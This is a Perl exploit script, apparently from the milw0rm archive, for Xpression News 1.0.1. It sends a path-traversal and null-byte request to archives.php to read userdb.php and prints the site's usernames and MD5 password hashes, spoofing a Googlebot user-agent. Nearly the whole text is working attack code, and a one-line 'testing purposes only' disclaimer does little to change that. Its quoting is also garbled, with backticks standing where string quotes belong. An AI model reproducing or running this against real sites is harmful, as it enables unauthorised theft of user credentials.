Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # XNews Remote File Disclosure Exploit # ################################################################################################# # Software: Xnews 1.0.1 # # # # Vendor: http://xpression.hogsmeade-village.com/ # # # # Released: 2007/01/28 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for Xnews administrator # # testing purposes only! # # # # Whats up Timq, tgo, str0ke, dr max virus # ################################################################################################# use IO::Socket; $port = `80`; # connection port $target = shift; # xpression.hogsmeade-village.com $folder = shift; # /demo/ sub Header() { print q {Xpression News File Disclosure Exploit - writ3r [at] gmail.com -------------------------------------------------------------- }; } sub Usage() { print q {Usage: xnewsxpl.pl [target] [directory] Example: xnewsxpl.pl xpression.hogsmeade-village.com /demo/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } $res = false; print `[+] Connecting...\r\n`; $xpack = IO::Socket::INET->new(Proto => `tcp`, PeerAddr => $target, PeerPort => $port) || die `[-] Failed to connect on exploit attempt. Exiting...\r\n`; print $xpack `GET `.$folder.`archives.php?xnews-template=../userdb.php%00 HTTP/1.1\n`; print $xpack `Host: $target\n`; print $xpack `User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n`; print $xpack `Accept: text/html\n`; print $xpack `Connection: keep-alive\n\n\r\n`; while (<$xpack>) { if (/(.*?)\|(.*?)\|(.*?)\|/) { print `Username: $1\n`; print `MD5 Hash: $3\n`; $res = true; exit; } } if ($res eq false) { print `[-] Exploit failed - Not vulnerable\n`; } print `[!] Connection to host lost...\n`; # milw0rm.com [2007-02-18]